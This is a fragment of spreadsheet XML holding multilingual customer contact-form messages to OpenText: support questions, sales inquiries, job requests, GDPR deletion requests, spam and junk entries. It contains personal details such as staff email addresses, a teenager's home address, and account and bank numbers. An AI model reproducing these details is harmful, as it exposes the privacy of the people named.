We are currently looking for the Content Management Server and Data Capturing solutions. Please advise how can we discuss in more detail. </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
aktuell befindet sich das Unternehmen für welches ich tätig bin in der Vorauswahl für ein geeignetes ECM-System bzw. einem geeigneten ECM-Anbieter._x000D_
In diesem Zusammenhang sind wir auf 'OpenText' aufmerksam geworden._x000D_
_x000D_
Da wir uns in einem regulierten pharmazeutischen Umfeld befinden wäre es u. a. sinnvoll zu wissen, ob Sie bereits Kundenreferenzen aus den Branchen Pharma und/oder Medizintechnik aufweisen können._x000D_
Deshalb wollte ich mich erkundigen, ob Sie mir namhafte Kundenreferenzen aus den genannten Branchen nennen könnten?_x000D_
Wenn dies möglich ist, wäre es zudem interessant zu wissen, ob diese Referenzen das ECM-System als On-Premise- oder Cloud-Lösung im Einsatz haben._x000D_
_x000D_
Schon einmal vielen Dank für Ihre Unterstützung._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Holger Egelhofer_x000D_
(Vetter Pharma-Fertigung GmbH &amp; co. KG)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
I wanted to speak with someone as I wanted to get a contact number or email address for our account manager at Open Text. I would grateful if someone could get back to me. _x000D_
_x000D_
Thanks_x000D_
Rebecca_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
I am not able to raise ticket in My support section of OpenText Portal._x000D_
It's giving me access denied even if i confirmed my email address._x000D_
Please help in this regards ASAP._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>help me</t>
  </si>
  <si>
    <t>Hi, I currently have an issue with RightFax with a "Bad fax phone number specified on outgoing fax." email stuck in an email loop. I have rebooted the server hosting rightfax and it stops the email for a few minutes but it begins sending again once the server comes back up. I am not sure where to stop "bad fax" message from being sent in RightFax so would appreciated some advice, current RightFax version is 10</t>
  </si>
  <si>
    <t>Ho are you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I work as a Team Developer consultat for both SLL-IT and Försvarsutbildarna. When I login to My Support I can see the SLL-IT account and download products SLL-IT is entitled too, and open Tickets for SLL-IT. I want to be able to log in for Försvarsutbildarna too._x000D_
I can use another email for a Försvarsutbildar account._x000D_
The contact at Försvarsutbildarna is Anki.kohler@forsvarsutbildarna.se_x000D_
_x000D_
Best regards_x000D_
Maria_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaite inscrire ma collaboratrice à la formation 3-2105 Vendor Invoice Management for SAP Solutions Consultant Bootcamp FR._x000D_
J'ai vu sur le planning de formation qu'il y avait une session à partir du 24/06 à La Défense._x000D_
Pouvez-vous m'indiquer quelle est la procédure à suivre pour l'inscrire svp ?_x000D_
_x000D_
Vous remerciant par avance_x000D_
_x000D_
Bien cordialement,_x000D_
Delphine MALPEZZI</t>
  </si>
  <si>
    <t>Plz Support Access</t>
  </si>
  <si>
    <t>Dear Support,_x000D_
Can you please tell me what is the latest version for OpenText Exceed TurboX Client launcher? Is there somewhere on the website where I can check the version upgrades regularly?_x000D_
Thank you in advance,_x000D_
Miklos Csehi</t>
  </si>
  <si>
    <t>Good morning,_x000D_
We would like to terminate our current account 832-1353 under Mr Zenigaonaindia's name because we are not longer making use of it._x000D_
We would like to stop receiving charges for it._x000D_
Thanks in advance,_x000D_
Pedro M Sanchez</t>
  </si>
  <si>
    <t>DMS for Internal/External letter communication</t>
  </si>
  <si>
    <t>Wir haben letztes eine Lizenz erworben._x000D_
Allerdings ist der PC wo diese eingespielt wurde defekt._x000D_
Der Mitarbeiter hat einen neuen PC bekommen und es ist uns leider nicht mehr möglich die die Software Brava! Desktop DXP 16.5 zu installieren._x000D_
_x000D_
Können Sie den Key auf eine neue MAC Adresse verifizieren?</t>
  </si>
  <si>
    <t>I have one open Text license ,Need help in applying the same.</t>
  </si>
  <si>
    <t xml:space="preserve">How Can I help you </t>
  </si>
  <si>
    <t xml:space="preserve">How can I help you </t>
  </si>
  <si>
    <t>I am trying to apply for a job in your esteemed organization for tge post of SAP SD/ MM analyst but I am unable to do so using google drive.</t>
  </si>
  <si>
    <t>Vendor Management Department,_x000D_
_x000D_
I am contacting on behalf of my company, TranslatorSociety._x000D_
_x000D_
We are a team of English-Spanish Certified Translators based in Argentina with great experience in all types of activities related to translation, edition, proofreading, testing, subtitling and DTP, as well as handling large volumes of words daily. We have broad experience in numerous translation agencies submitted work delivered through other intermediaries (Bank of America, JP Morgan, Dell, EMC, DCGovernment, Microsoft, HAI, Maytronics, Harvard University, Sonos, Sirota Consulting, Zzish, Laureate, etc.)._x000D_
_x000D_
Our purpose is to grow and we believe that this labor relationship can be a great achievement. Our ability to work in team and desire to develop our career make us particularly suited for the job. Furthermore, we believe that this job would offer exciting challenges. _x000D_
_x000D_
Looking forward to hearing from you soon,_x000D_
Gonzalo Gorri</t>
  </si>
  <si>
    <t>Way back when I worked in local government, we worked with PC Docs to develop an electronic document management system.  I later used the Hummingbird product.  Now in my latest position, we're looking for an enterprise content management system and I understand that Hummingbird was bought by Open Text._x000D_
I would like to speak with someone, asap, regarding what solutions you offer and at what cost.</t>
  </si>
  <si>
    <t>Just wondering if you can supply a list of all vendors that offer DF120/DF210 in-person training. We are are of CBIT in Canberra, but would like to know some alternatives.</t>
  </si>
  <si>
    <t>What version RightFax is required for integration with Mitel MiVoice Connect?_x000D_
We have a mutual customer in Newport Utilities in Newport, TN. We are upgrading ShoreTel 14.2 to Mitel MiVoice Connect. I need to know if the current RightFax is compatible or upgrade required. If upgrade required, what would be the cost?</t>
  </si>
  <si>
    <t>I am looking into contract lifecycle management systems and would like to learn more about your solution. At this time, I'm also specifically interested in how Opentext integrates with major procurement systems.</t>
  </si>
  <si>
    <t>Looking for the a table that describes what all the status codes mean.  Might need assistance with a particular one in which transmission errors are taking place and coming back with Resulting status code (0/352; 4/151): Unknown.  Found an article that states I can put in a reg key DoNotRoutePartialFaxes to assist with this issue, but what might need to be done with the Transmission Errors showing up in the queus.  These particular faxes are going to a file share.</t>
  </si>
  <si>
    <t xml:space="preserve">We do not currently have any Document Management system in place. We need something deployed in 30 days. We are interested in Salesforce and internal/custom app integration, web access, and version control. We are looking at M-Files, OpenKM, and OpenText. We need to decide ASAP on a platform and get it deployed quickly. </t>
  </si>
  <si>
    <t>HN</t>
  </si>
  <si>
    <t xml:space="preserve">Buen día, el SAR actualmente se encuentra en proceso de implementar un proyecto de gestión documental, en el cual pretende tener almacenada la información estática de forma segura, es decir que está sea clasificada, encriptada y accesada por medio de privilegios. De igual manera necesita tener una visión de los documentos en movimiento por medio de auditorías y definición de flujos de procesos.  </t>
  </si>
  <si>
    <t>I'm not sure if my first attempt to fill out this form was submitted properly (couple weeks ago), so I am giving it another go.  I have a new PC, as my old one got replaced.  I need to install the Actuate BIRT desiger, so I can create/modify our reports and business objects.  I do not have my old key, and am wondering how I can proceed with getting an updated license key for my new PC.  It has been a while since I've contacted, but our organization used to be called Brandon Regional Health Authority, but is now Prairie Mountain Health; not sure which our account would be under._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Thomas</t>
  </si>
  <si>
    <t>Good Afternoon, I wanted to reach out to see if our current Fax2Mail is HIPPA Compliant? We have sensitive data being sent to some end users mailboxes and wanted to ask the security that is being used for the data being sent? Thank you.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I would like to know if you have any plugin to connect Content Server to Dynamic 365?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to become an affiliate. I have a website where I blog and post links_x000D_
</t>
  </si>
  <si>
    <t>Faxes are not being received into e-mail since last Thursday 1/31._x000D_
_x000D_
E-Fax is working and receiving faxes into the RightFax Portal, however, they are not being received by e-mail.  Nothing has changed and all Services within server appear to be working fine._x000D_
_x000D_
Restarted OpenText Worker Host and OpenText FaxTransporter within Services.msc but to no avail._x000D_
_x000D_
Please advise._x000D_
_x000D_
-Kevin Eimers</t>
  </si>
  <si>
    <t>I;m inquiring how I can get training on using WatchedDirectory. The WatchedDirectory topics in the v16 documentation is sparse. If there is no training available, is it possible to get an OpenText Engineer to visit my site to help demonstrate best-practices on this topic?</t>
  </si>
  <si>
    <t>This is the third time I have completed this form and no one has contacted me yet. Would it be possible for someone to contact me to discuss integration with our EMR. Thanks, Sue</t>
  </si>
  <si>
    <t>looking to get a quote to have our rightfax software put back under maintenance. I believe we let it lapse in 2016</t>
  </si>
  <si>
    <t>need to add email to our current fax service</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We currently use EnCase Forensic version 7, but are looking into upgrading to version 8. Can you please provide the minimum and recommended hardware specifications for running version 8?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Best,_x000D_
_x000D_
Pedro</t>
  </si>
  <si>
    <t>I am planning to attend the ED290 course - EnCase eDiscovery Training, but I have not decided between the session in Washington DC (March) or Pasadena (June). I've been searching for the address of GSI-Washington DC, to see if the place is better than Pasadena to do some sightseeing, but I can not find it anywhere. Could someone provide it to me?</t>
  </si>
  <si>
    <t>The test2 API's are not available!  Please resolve ASAP as we are in the middle of active development and reliant upon this site</t>
  </si>
  <si>
    <t>I have a few questions that I hope someone can answer for me._x000D_
What version of EnCase is used in the training?_x000D_
What version of Windows is used in the training?_x000D_
If I have taken a training class in the past, can I take it again and receive the necessary 32 CPE credits for renewing my EnCE?</t>
  </si>
  <si>
    <t xml:space="preserve">Reference Number: RC260077 _x000D_
Contract Number: 0012259746 Maintenance Term Start Date: 1/1/18 Maintenance Term Expiration Date: 12/31/18_x000D_
 Quote Expires: 1/15/18_x000D_
_x000D_
I need a renewal quote please , I am  a reseller_x000D_
</t>
  </si>
  <si>
    <t>Am trying to register to download software to use my Opentext encase USB, but its giving me server error when tying to make account, and I cannot login to my account because ive never signed up before._x000D_
Please let me know how to proceed, this is a time sensitive matter.</t>
  </si>
  <si>
    <t>Sex</t>
  </si>
  <si>
    <t>Va te faire foutre</t>
  </si>
  <si>
    <t>Questions about RightFax Server for fax services</t>
  </si>
  <si>
    <t>Please provide key and exact install instructions for license server including system requirements to be used with purchased OpenText floating licenses.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon. My company enrolled me in the subscription  9-9900 OpenText Learning On Demand Subscription sometime in December. I have already completed 1/2 self pace Hands On Labs. I thought I submitted a requested for the second one toward the beginning of January, but I am not finding an email with the confirmation like I had for the first lab. I just tried to submitted a request again for the Hands On Lab, but it will not let me sign in to OpenText Connect. It claims I do not have an account. I would like some assistance in how I can get my 2nd Hands On Lab registered. </t>
  </si>
  <si>
    <t>ZW</t>
  </si>
  <si>
    <t xml:space="preserve">Not sure where to start... OPS did use FirstClass for a number of years.  October 2014 we switched to Office365, but still had the FC Archive.  This server is now old and unreliable; need a quote for someone's help to access the data and make it available for eDiscoverys.  Possible to get a conversation scheduled to discuss options?  </t>
  </si>
  <si>
    <t>Hello, my company is seeking to deploy an electronic fax tool to help track and consolidate faxes to and from our clients.  I'm interested in learning more about your tool and seeing if it is potentially a fit for our business.</t>
  </si>
  <si>
    <t>OCWA South Peel has recently upgraded to a recent version, self hosted, content server and would like to collaborate for a private training session for a group of key users.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I was looking into the Integration of SAP and Open Text and found several SAP modules related to the non S4 Versions to be integrated. _x000D_
I got very interested in the options to integrate Open Text in Fiori Apps and also which objects in the S4 world can be integrated._x000D_
Can you provide further information on that? _x000D_
I am sending this inquiry in order to support a customers decision to go for an open text solution since it can hopefully be integrated also with S4._x000D_
thanks &amp; regards_x000D_
Julia</t>
  </si>
  <si>
    <t>I have been trying to reach someone to get contact information to whom I can send a Request For Proposal. The phone numbers appear to be incorrect, as I keep getting bounced around and placed on hold for long periods of time. I have also submitted this form once with no response.</t>
  </si>
  <si>
    <t>Are there specific DTC settings recommended for Metastorm? If so, can you please provide it via my email. Thank you!</t>
  </si>
  <si>
    <t>Hello Opentext,_x000D_
_x000D_
Good day.  I am very much interested in applying for the post of Director, Enterprise Business Systems (IT/Finance). I did apply and tried registering in your online system and uploaded my resume. With that, I would like to get confirmation if my resume did indeed had a successful upload and if you can access/download it from your end._x000D_
_x000D_
I look forward for your response._x000D_
_x000D_
All the Best,_x000D_
Mr. Sir Winston Malapad</t>
  </si>
  <si>
    <t>We work with eReports._x000D_
One of our data sources is going to move to MongoDB._x000D_
Is there a way to connect eReports to MongoDB?</t>
  </si>
  <si>
    <t xml:space="preserve">I am a project manager in the Investments Group for the Church Commissioners in the UK. _x000D_
We have identified a need for a document management system to assist with the fund research and analysis as well as general storage of documents relating to the management of properties. _x000D_
We're currently putting together a list of DMS vendors, but have comprehensive CRM requirements as well. Ideally, we are looking for a single solution to cover all our requirements and are interested whether your product could, potentially satisfy some or all of our needs. _x000D_
_x000D_
At this preliminary stage, we are seeking to know a little more about your product(s) and perhaps see a short demo._x000D_
</t>
  </si>
  <si>
    <t>Greetings, _x000D_
We have had some turnover here and need to reset our password.  I think the reset password is going to an email recipient that is not longer here.  I need to load our latest product.  Please help.</t>
  </si>
  <si>
    <t>Dear Sir or Madame,_x000D_
my name is David, I am currently 15 years old and I am visiting the 9th Class on the Städtisches Gymnasium Rheinbach with English-German bilingual education. In my free time I do simple development of Arduino and HTML and I like creating Videos. I also do sports._x000D_
Since I am very interested in Informatics, and my school allows an interenship from the 25th to the 27th of July I would love to have a chance to gain experience in this work field._x000D_
I would be happy to get a reply,_x000D_
David Schmidt._x000D_
_x000D_
Sonnenscheinstr. 32, 53359 Rheinbach</t>
  </si>
  <si>
    <t>TESTING - SUBSCRIBE</t>
  </si>
  <si>
    <t>I would like to discuss how the opentext content server compares to SAP's.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
_x000D_
Je suis consultant en Cloud travaillant pour une entreprise nous cherchons à migrer le logiciel OpenText Analytics en tant que produit Cloud SaaS._x000D_
_x000D_
Pour ce faire, nous vous demandons de nous renseigner sur le produit équivalent SaaS du logiciel OpenText Analytics:_x000D_
_x000D_
-existe-t-il un produit équivalent SaaS pour ce logiciel ?_x000D_
_x000D_
-Si le produit équivalent SaaS existe, pourriez-vous s'il vous plaît partager avec nous la brochure de prix? _x000D_
   (exemple: prix par mois/par niveau de service/par nombre d'utilisateurs/par nombre de demandes)._x000D_
_x000D_
Bien Cordialement,_x000D_
_x000D_
Rayan HARZALLAH_x000D_
Junior Consultant_x000D_
Digital Technology Platforms Consulting / CIO Advisory_x000D_
_x000D_
DXC Technology_x000D_
TOUR CARPE DIEM_x000D_
31 PLACE DES COROLLES_x000D_
CS 40075_x000D_
92098 PARIS LA DEFENSE CEDEX_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to provide a cost-effect fax server solution for a healthcare client for 4, potentially 8 fax lines. </t>
  </si>
  <si>
    <t>Please send a W9</t>
  </si>
  <si>
    <t>We have some new team members who need support accounts to enable them to submit support tickets. These team members are as follows:_x000D_
1) Mohammed Kobir (mohammed.kobir@macfarlanes.com)_x000D_
2) Joanna Schmidt (joanna.schmidt@macfarlanes.com)_x000D_
3) Samuel Grange (samuel.grange@macfarlanes.com)_x000D_
4) Jessica Thain (jessica.thain@macfarlanes.com)_x000D_
Is it possible for them to be set up?_x000D_
Many thanks, Alison</t>
  </si>
  <si>
    <t>Hello,_x000D_
We're interested in learning more about how the Enterprise Information Management solution. Would you be able to send across a video of how it works?_x000D_
Thanks!</t>
  </si>
  <si>
    <t>If possible, I would like to get a quote for two classes Foundations in Digital Forensics with EnCase® vClass and Building an Investigation with EnCase® vClass which will be for a grant funded position which will potentially be filled.Thank you.</t>
  </si>
  <si>
    <t>Interested in learning more about Hybrid Faxing with OpenText RightFax Connect and budgetary cost for the service.</t>
  </si>
  <si>
    <t xml:space="preserve">I received invoice 1902854477 for account number 854477 via the email address gdiscala@integrehab.com.  Gilda DiScala is no longer with Integrated - can you please update the account to reflect my contact information for future invoices?  Thank you.  </t>
  </si>
  <si>
    <t>Unable to rest my password, i had registered my account using email id " jai_trinity@yahoo.co.in" but when i try to reset it it says this email id is incorrect .</t>
  </si>
  <si>
    <t>Hi, _x000D_
I found your product on internet as a fax solution. I have Cisco CUCM version 11.5, and a series of shared PSTN lines with faxes, that I want to migrate to SIP Trunk._x000D_
I need to test the solution before presenting it to my customer._x000D_
Is there anyway we could have a copy of the product, for testing purposes, and a quote?_x000D_
Many Thanks,_x000D_
Rafael Paniccia</t>
  </si>
  <si>
    <t>Enquiry; Open Text products that are similar to / alternative to READSOFT for SAP - Payables/Invoice scanning and process management.</t>
  </si>
  <si>
    <t>I have licensed version of Encase 8.08. In my version why the index text and metadata is disabled? Kindly reply.</t>
  </si>
  <si>
    <t>I have a problem to open *DOC files from documentum. I have no peoblems with excel files, pdf etc. When I am opening doc file from documentum then I got  message "A valid application does not exist" . Of course MS office with word is installed. So I have to choose manually application : C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE AND choose FORMAT (MS WORD). Then file is opening but only one time ! I have to to the same procedure opening next time doc file (also the same doc file). Please help me to solve that problem. _x000D_
_x000D_
Maciej</t>
  </si>
  <si>
    <t xml:space="preserve">can you give me local contact in New Delhi India, want to know about the document archival from files or scanner._x000D_
</t>
  </si>
  <si>
    <t>We have Encase site license til 2021. Where can i get newest version of  Encase?</t>
  </si>
  <si>
    <t>Psioxus is looking to implement EDMS system, I would like to have a key contact to set up a CDA to allow initial discussions please.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
I was curious about the possibility of an internship for the coming Summer in Cork if at all possible. I am passionate about technology and data analytics and would be interested in working for your company._x000D_
_x000D_
I look forward to your reply._x000D_
Kind Regards,_x000D_
Michelle Condon_x000D_
Business Information Systems Ucc_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking for a cognitive OCR solution to digitize our back-office processes._x000D_
Our main task is to create/buy a system that can extract entities (e.g. name of a client, phone, address) from pdf docs. The text in these pdf-docs is in the form of an image so we have to OCR them (Russian language). We want the system to be automatically learned through the continuous process of an extraction - validation - train cycle. Can your product provide that function? Thank you!</t>
  </si>
  <si>
    <t>Wishing to know pricing for DAM solution</t>
  </si>
  <si>
    <t>We would like to see a demo of your product._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Do you provide document scanning services i.e. Document Digitalization?</t>
  </si>
  <si>
    <t>Bom dia,_x000D_
Teria algum e-mail o qual eu possa mandar meu currículo a vocês?_x000D_
Obrigada.</t>
  </si>
  <si>
    <t>Hej _x000D_
_x000D_
Jag skulle vilja veta kostnaden för att uppgradera ett par licenser för Gupta Team Deleveloper v 6 till version 7. _x000D_
_x000D_
Med vänliga hälsningar</t>
  </si>
  <si>
    <t xml:space="preserve">Добрый день!_x000D_
Компания «Инвитек Менеджмент» рада предложить Вам взаимовыгодное сотрудничество в рамках реализации проекта по размещению Вашего офиса в бизнес-центре класса «B+» «Scandinavian». _x000D_
Предлагаем Вам рассмотреть возможность аренды в нашем бизнес-центре единого офисного блока площадью от 7 000 кв. м. с возможностью дальнейшего расширения до 12 500 кв. м. Данный проект интересен тем, что на наших свободных площадях мы готовы создать офис именно под Вас, где будут учтены максимальные требования к планировкам, комфорту и дизайну. Для этого мы регулярно посещаем офисы IT-компаний и стараемся почерпнуть новые идеи для воплощения их в жизнь. Наши планы достаточно амбициозны, но у нас есть все для того, чтобы их выполнить: качественные офисные помещения с современными инженерными системами, команда профессионалов своего дела, финансовая поддержка, концепция развития бизнес-центра и бесценный опыт уже реализованных проектов._x000D_
Для нас сотрудничество с Вами – это возможность развить бизнес-центр «Scandinavian» как презентабельный деловой центр и технопарк. Для Вас – получить офис своей мечты!_x000D_
Надеемся, что наше предложение будет Вам интересно. Приглашаем Вас посетить бизнес-центр «Scandinavian» и убедиться в перспективах реализации этого проекта. _x000D_
Всегда рады Вам и ждем Вас в гости!_x000D_
*Данное предложение является прямым предложением от собственника бизнес-центра. Если же Вас не заинтересовало предложение, то мы будем признательны и благодарны, если Вы окажете содействие по привлечению Ваших деловых партнеров и дружественных компаний в наш проект._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Right to be Forgotten as a EU citizen._x000D_
_x000D_
I recently sent an account removal request, since I will be quitting my current company._x000D_
_x000D_
I would also like you to delete all my info, as described in GDPR._x000D_
_x000D_
Best regards.</t>
  </si>
  <si>
    <t>Hello._x000D_
I will be quitting my curent company (unisystems) in two weeks time and I will no longer be needing the opentext account._x000D_
_x000D_
Please delete this account along with any related information._x000D_
_x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>Neuverhandlung eines bestehenden Vertrags Vertragsnummer 0073036831</t>
  </si>
  <si>
    <t xml:space="preserve">We have recieved invoie 9000960234 and since you are a new supplier we need you to confirm bankdetails. GB34CITI185XXXXX763697_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
I am not able to see my informations under "My Account". Is there any reason about that ?_x000D_
In addition to that, we would like to move some of our licenses from a computer to another one. Is there a documentation explaining how to do it correctly ? Should we first desactivate them and then activate them on the other computer ?_x000D_
_x000D_
Thanks in advance for the answer._x000D_
Best Regards_x000D_
_x000D_
Célien Descloux_x000D_
</t>
  </si>
  <si>
    <t>Interested in B2B channel ecommerce. Please help understand the offering</t>
  </si>
  <si>
    <t xml:space="preserve">I'm developer of an OpticalReading application that is using RECOSTAR._x000D_
I'm now responsible of RECOSTAR application build in 1997 and that is running on 2 customers in Luxembourg._x000D_
I see now that some time IFG application stop to work correctly on Windows 7 and it is indicated in your Release Note that IFG it not more supported on Windows 7._x000D_
_x000D_
I search to know how easy (or difficult) it would be for me (C++ developer since 1986) to replace IFG and to adapt old C++ program that have not changed since 1997 (just a little)._x000D_
_x000D_
I have installer RECOSTAR 6.0 on my PC and I have started Recostar Visual Studio to start Migration from Tools menu. But when I click on migration, RDS request an HEX file !!!_x000D_
Personally, I thought that RDS will migrate .PC file in which Forms are defined._x000D_
Sorry, but I need more information to know how to replace IFG and what is migration impact on C++ programs._x000D_
Can some body help me ? _x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Hello. We intend to change our company name but our ABN will remain the same. Does this have an effect on our EDI credentials ?  Thank you.</t>
  </si>
  <si>
    <t>Hello, I'm from Georgia'a National Forensics Bureau and we are using your product (encase) and now we want to extend our license and support. Can you send me detailed datasheet of Newest encase, where will be all features of this software. Thanks in advance.</t>
  </si>
  <si>
    <t>Just want to know the pricing for OpenText - RightFax</t>
  </si>
  <si>
    <t>FM</t>
  </si>
  <si>
    <t>úžasně V pṛṿṇí ɗeṣítce ȥaboɗоvaly і hraɗy Ⱨоսṣкa a Koṣt. Меȥi ṇеjlảкaⅴĕjší míṣṭa Čeṣke ṛepuḅḷiкy рaṭří už ṭraɗiĉnḝ̱ і ṿoɗní ṇảdṛž Lірnо nеḅо Рrорast Macоcha. Кaždý ȥe zмíṇěṇých cíḷů ḷiɗе vḷоṇі ȥadali do aplikace Ṃapу.cȥ рřіḅḷižnḝ̱ 70 000kṛáṭ.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
We are a current EMC/Dispatcher client and Im struggling to touch base with an AM / Sales contact in Australia. Can someone please call/email me as soon as possible?_x000D_
_x000D_
Ken</t>
  </si>
  <si>
    <t>Can I please have access to the knowledge base so I can search for best practices and system improvements</t>
  </si>
  <si>
    <t>After confirming my email id is still showing below message and i am unable to access the KB._x000D_
"I cannot access to Knowledge based after confirmation of my email._x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."_x000D_
 Please help.</t>
  </si>
  <si>
    <t>have some questions about RightFax &amp; Office 365 please</t>
  </si>
  <si>
    <t>_x000D_
I have the receipt of the bank of the bank, of the payment with date 02/03/2019_x000D_
I can upload the invoice._x000D_
I have opened a ticket where I have included the bank payment in .pdf</t>
  </si>
  <si>
    <t>I am looking for an Summer Internship in your company.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
Mercado Produtor is a credit fintech and a B2B2C marketplace and we are interested in your financial services solutions for digital onboarding and virtual bank branch._x000D_
Look forward to your contact with thanks and best regards.</t>
  </si>
  <si>
    <t>AG</t>
  </si>
  <si>
    <t>Ninjaboy1go didn’t go away last night am mad</t>
  </si>
  <si>
    <t xml:space="preserve">We try to verify our account to get the support we try to call the number its not in service as we need to update and register our license  </t>
  </si>
  <si>
    <t>we have no access to QM. please help asap.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Guidance Software,_x000D_
_x000D_
I’m writing on behalf of my team from the University of Colorado Boulder’s Designing for Defense Cohort (h4di). We’d like to ask for a small amount of your time to aid our research concerning Internet of Things devices. Our research involves the security of IoT devices, and we’ve been sponsored by the Office of the Under Secretary of Defense for Intelligence to develop an effective method for better distinguishing between IoT and non-IoT traffic._x000D_
_x000D_
Our team would greatly appreciate an opportunity to further discuss this topic with you, as we believe your insight will greatly assist us in our efforts. If you’re available to speak with us for a 30-60 minute interview that would be wonderful. We would love to get your input on current technical challenges in securing the Internet of Things, as well as existing solutions._x000D_
_x000D_
Thank you very much for your consideration!_x000D_
_x000D_
Sincerely,_x000D_
Ace Naistadt_x000D_
</t>
  </si>
  <si>
    <t>Hello, I would like some information about the cost of using and storing data via LearnLink/OpenText. I am familiar with this program as we used it during my undergraduate years in the BHSc at McMaster University in Hamilton. I currently work with a group of 12-14 physicians and 10-12 administrative/nursing staff, and was looking at a novel secure way for our group to communicate internally and store confidential clinic related information (e.g. manuals, procedures, meeting agendas and minutes, possibly patient related or clinic financial data, etc.). I understand downloading the program is free, however, I'm curious if there is a cost associated with having accounts and storing information. Please advise. Thank you.</t>
  </si>
  <si>
    <t>Foermerly access to mySupport was possible. Now its is restricted._x000D_
Please check._x000D_
_x000D_
PS: Gupta Maintenance contract exists and is payed !!!</t>
  </si>
  <si>
    <t>Apakah tersedia negara indonesia _x000D_
Atau paypal</t>
  </si>
  <si>
    <t>Finding a job</t>
  </si>
  <si>
    <t xml:space="preserve">Barrow Money_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to implement workflow solution to our invoice processing project. Since I know this application from my previous company would like to understand if the workflow can be set up for our existing process. </t>
  </si>
  <si>
    <t xml:space="preserve">Need a loan_x000D_
</t>
  </si>
  <si>
    <t>I am unable to apply for the role of HR Project Assistant, due to an issue with Google Drive. Is there an email address I can forward my resume and cover letter to?_x000D_
_x000D_
Regards,_x000D_
Mark Lennox</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Ma’am,_x000D_
Greetings! _x000D_
12th Edition of International Conference on Endocrinology &amp; Diabetology is honoured to propose you the Mutual Collaboration as a media partner to develop and share the latest advancements in the field of Endocrinology, with special emphasis on the Current Research &amp; Advancements in the field of Endocrinology &amp; Diabetology. _x000D_
_x000D_
We would be glad to invite you to the “12th Edition of International Conference on Endocrinology &amp; Diabetology” scheduled to be held in Berlin,Germany. September 02-03, 2019. _x000D_
_x000D_
Opportunities: _x000D_
•	Access to latest research development _x000D_
•	Advertising Organization information on Websites, brochure and conference proceedings_x000D_
•	Augmenting credibility by highlighting your company’s expertise_x000D_
•	Be endorsed to attendees’ networks_x000D_
•	Brand logo awareness &amp; recognition through advertisement_x000D_
•	Free Media Partnering Opportunities _x000D_
•	Generation of new sales &amp; forming new partnerships _x000D_
•	Precisely targeted marketing _x000D_
•	Reduced Registration Prices for delegates and speakers_x000D_
•	Socializing with the audience _x000D_
•	You can organize Workshop _x000D_
_x000D_
For more details of the conference and organizing committee members, kindly visit the official website at: _x000D_
Do feel free to write to us with regards to any further queries. _x000D_
Awaiting for your prompt and supportive response._x000D_
----------------------------_x000D_
Thanks &amp; Regards,_x000D_
Jenny Jackson | Program Director_x000D_
EuroSciCon Ltd    _x000D_
40 Bloomsbury Way _x000D_
Lower Ground Floor _x000D_
London, United Kingdom      _x000D_
WC1A 2SE        _x000D_
E-mail: endocrinology.2018@yandex.com_x000D_
_x000D_
WhatsApp:+442382146717_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Mam,_x000D_
_x000D_
We are from a company called Adityaan Solutions which deals with complete BGV services. _x000D_
_x000D_
Adityaan Solutions deals with different types of verification like,_x000D_
_x000D_
Address Verification, Education Certificates Verification, Ex Employment Verification, Etc..._x000D_
_x000D_
If you can please provide us an face to face appointment we will come directly to your office and provide you all the details related to our services. Please feel free to call us any time._x000D_
_x000D_
Looking forward to hear a positive response from you. </t>
  </si>
  <si>
    <t>Need to discuss career fair opportunites.</t>
  </si>
  <si>
    <t xml:space="preserve">We have on prem Right Fax Solution and are looking to move to the cloud solution. I read about Right Fax Connect and want more information regarding it. </t>
  </si>
  <si>
    <t>Quisera  saber como funcionan los cursos de montaje y soporte  para  la  aplicacion DM open text</t>
  </si>
  <si>
    <t>Coins</t>
  </si>
  <si>
    <t>To whom it may concern:_x000D_
_x000D_
Hello,_x000D_
_x000D_
I am a student at Ryerson University currently working on a capstone project. I am looking for Vendors for my client (Canada Post) to optimize their business processes. _x000D_
_x000D_
Please contact me for further details. Thank you._x000D_
_x000D_
Best Regards,_x000D_
Ali Muhammad</t>
  </si>
  <si>
    <t xml:space="preserve">A seguito di guasto del server avrei bisogno del file di installazione versione 5.3. Anticipatamente si ringrazia della collaborazione. Seriale e password già in mio possesso. </t>
  </si>
  <si>
    <t xml:space="preserve">We need contact information to send an RFP for your RightFax cloud based faxing product. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a contact name at Open Text who would work with Print Partners (Vendors) and would look forward to discuss opportunities to work together in investigating areas where we could provide products and services to Open Text.  Thanks very much for a follow up.  Yours truly,_x000D_
Kevin  </t>
  </si>
  <si>
    <t>trying to figure out where to purchase a license and how much it costs.</t>
  </si>
  <si>
